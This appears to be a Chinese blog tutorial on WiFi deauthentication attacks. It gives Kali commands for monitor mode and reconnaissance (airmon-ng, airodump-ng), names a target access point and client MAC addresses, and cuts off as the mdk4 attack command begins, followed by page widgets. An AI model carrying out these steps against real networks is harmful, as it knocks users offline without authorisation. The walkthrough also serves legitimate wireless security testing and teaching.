WiFi Deauth 攻击演示分析 // mdk4 // aireplay-ng// Kali // wireshark //

对WiFi发动取消认证攻击(Deauthentication)

取消认证攻击是最简单的攻击手段之一,但破坏性奇高,可以轻易让无线网络环境瘫痪。

阶段一:信息收集

1. 查看网卡接口

ip addr

2. 检查并杀死冲突进程

airmon-ng check kill

3. 开启监听模式

airmon-ng start wlan0

4. 验证是否处于监听模式

airmon-ng

5. 获取目标AP信息

airodump-ng wlan0mon

目标AP:

ESSID:    TPGuest-77E0
BSSID:    82:8F:1D:FB:77:E0
Channel:  1  

6. 针对该AP进行监听

airodump-ng --bssid 82:8F:1D:FB:77:E0 -c 1 wlan0mon

7. 获取所连接设备MAC (可选)

设备一:E0:DC:FF:CC:0E:91
设备二:18:01:F1:B2:B3:02

阶段二:发动攻击

1. mdk4(同时进行Deauthentication 和 Disassociation)

  • 针对指定客户端

    mdk4 w
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值